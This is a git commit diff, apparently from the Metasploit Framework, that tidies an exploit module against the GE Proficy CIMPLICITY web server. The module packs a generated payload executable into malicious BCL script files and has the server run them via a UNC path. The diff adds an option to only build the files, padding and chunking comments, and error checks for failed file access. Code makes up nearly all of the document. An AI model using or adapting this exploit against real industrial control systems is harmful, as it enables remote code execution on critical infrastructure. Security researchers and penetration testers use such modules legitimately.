Add small fixes and clean up

2014-02-25 15:25:01 -06:00 · 2014-02-25 15:25:01 -06:00 · cb18639b66
parent 1d4b2ea60d
commit cb18639b66
1 changed files with 16 additions and 6 deletions
--- a/modules/exploits/windows/scada/ge_proficy_cimplicity_gefebt.rb
+++ b/modules/exploits/windows/scada/ge_proficy_cimplicity_gefebt.rb
@ -51,7 +51,8 @@ class Metasploit3 < Msf::Exploit::Remote
        Opt::RPORT(80),
        OptString.new('URIPATH',   [ true, 'The URI to use (do not change)', '/' ]),
        OptPort.new('SRVPORT',     [ true, 'The daemon port to listen on (do not change)', 80 ]),
-        OptString.new('UNCPATH', [ false, 'Override the UNC path to use.' ]),
+        OptString.new('UNCPATH',   [ false, 'Override the UNC path to use.' ]),
+        OptBool.new('ONLYMAKE',    [ false, 'Just generate the malicious BCL files for using with an external SMB server.', true ]),
        OptString.new('TARGETURI', [true, 'The base path to the CimWeb', '/'])
      ], self.class)
  end
@ -184,9 +185,13 @@ class Metasploit3 < Msf::Exploit::Remote
    print_status("BCL's available at #{@exploit_unc}#{@share_name}\\#{@basename}{i}.bcl")

    unless datastore['UNCPATH'].blank?
-      print_warning("Remember to upload the BCL files to the remote share!")
      @bcls.each_index { |i| file_create("#{@basename}#{i}.bcl", @bcls[i]) }
-      exploit_bcl
+      if datastore['ONLYMAKE']
+        print_warning("Files created, remember to upload the BCL files to the remote share!")
+        print_warning("Once ready set ONLYMAKE to false")
+      else
+        exploit_bcl
+      end
      return
    end

@ -221,11 +226,13 @@ class Metasploit3 < Msf::Exploit::Remote

  def make_bcls
    exe = generate_payload_exe
+    # Padding to be sure we're aligned to 4 bytes.
    exe << "\x00" until exe.length % 4 == 0
-
    longs = exe.unpack("l*")
-
    offset = 0
+
+    # gefebt.exe isn't able to handle (on my test environment) long
+    # arrays bigger than 16000, so we need to split it.
    while longs.length > 0
      parts = longs.slice!(0, 16000)
      @bcls << generate_bcl(parts , offset)
@ -241,7 +248,6 @@ class Metasploit3 < Msf::Exploit::Remote
    end

    <<-EOF
-Declare Function cor_IsTerminalServicesEnabled Lib "fasrtl" As Boolean
 Option CStrings On

 Sub Main()
@ -267,9 +273,13 @@ End Sub

    res = send_request_cgi('uri' => uri)

+    # We use res.to_s because the embedded CIMPLICITY Web server doesn't
+    # answer with valid HTTP responses.
    if res and res.code == 200 and res.to_s =~ /(^Error.*$)/
      print_error("#{peer} - Server answered with error: $1")
      fail_with(Failure::Unknown, "#{peer} - Server answered with error")
+    elsif res and res.code == 200 and res.to_s =~ /No such file or directory/
+      fail_with(Failure::BadConfig, "#{peer} - The target wasn't able to access the remote BCL file")
    elsif res and res.code == 200
      print_good("#{peer} - Answer has been successful")
    else